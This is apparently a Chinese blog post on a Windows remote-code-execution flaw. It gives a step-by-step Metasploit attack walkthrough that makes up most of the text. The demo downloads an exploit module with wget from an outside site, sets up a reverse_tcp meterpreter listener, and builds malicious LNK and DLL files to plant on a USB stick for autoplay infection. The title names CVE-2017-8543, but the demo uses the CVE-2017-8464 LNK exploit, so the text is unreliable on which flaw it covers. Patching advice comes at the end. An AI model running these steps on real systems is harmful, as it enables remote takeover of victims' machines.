0x01概述
我大概說一下,Windows Search是一個什么鬼東西,Windows Search是Windows搜索服務(WSS)即windows的一項默認啟用的基本服務,允許用戶在多個Windows服務和客戶端之間進行搜索。當Windows搜索處理內存中的對象時,存在遠程執行代碼漏洞。成功利用此漏洞的攻擊者可以控制受影響的系統。受影響的windows系統,我一會補充在下面。
0x02漏洞級別
漏洞級別:嚴重
(說明:漏洞級別共四級:一般、重要、嚴重、緊急)
0x03影響范圍
桌面系統:Windows XP, Vista, 7, 8, 8.1, RT 8.1, 10(次不刺激?)
服務器系統:Windows Server 2003,2008,2012,2016
微軟給出的參考說明:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8543
0x04進入演示攻擊
那么網上給出的報告僅僅只是報告,我今天就來帶大家演示一遍攻擊過程。首先我要模擬攻擊者和靶機。
kalix86 192.168.1.109 攻擊機
windows7x64 192.168.1.101 目標靶機
1.kali主機下載cve_2017_8464_lnk_rce.rb:
cd /opt wget http://www.jvwkvg.tw/file/cve_2017_8464_lnk_rce.rb
將cve_2017_8464_lnk_rce.rb拷貝到
/usr/share/metasploit-framework/modules/exploit/windows/smb/目錄下:
cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
生成監聽shell:
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.109 msf exploit(handler) > exploit -j
生成大量的.LNK文件(對應盤符從D盤到Z盤)和要加載的.dll文件(后門文件, copy了一個lnk文件(根據插入靶機U盤后識別的盤符,例如我插入U盤后顯示的E盤,所以就選擇了E結尾的lnk文件)和dll文件到U盤)
msf exploit(handler) > back msf > use exploit/windows/smb/cve_2017_8464_lnk_rce msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.1.109 msf exploit(cve_2017_8464_lnk_rce) > exploit
將/root/.msf4/local/*所有文件拷貝到/opt目錄下的test文件夾中,然后拷貝到目標靶機windows7X64上
[email protected]:~# cd /opt [email protected]:/opt# mkdir test [email protected]:/opt# cp /root/.msf4/local/* test/ [email protected]:/opt# cd test/ [email protected]:/opt/test# ls
拷貝的本機win7x64上:
然后點擊快捷鍵,就會觸發注冊dll文件,如果不行直接注冊dll文件(一般是將這項快捷鍵和DLL文件拷貝到一個文件夾里面然后拷貝到U盤,只要對方開了U盤自動啟動播放功能,就會自動觸發注冊dll文件)
在kali下可以看到成功獲得sesions會話為1
sessions -i 1
然后進入到會話,就會成功進入到metermter的shell界面:
到這里就演示結束了..
0x05排查方案
檢查windows系統版本,如果版本在受影響的產品清單中,則受該漏洞影響。
0x06安全建議
1.在系統防火墻或者安全組對445端口進行限制;
2.升級建議:可通過Windows Update自動更新微軟補丁修復漏洞,也可以手動下載補丁,補丁下載地址:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8543
注意:修復漏洞前請將資料備份,并進行充分測試。
發表評論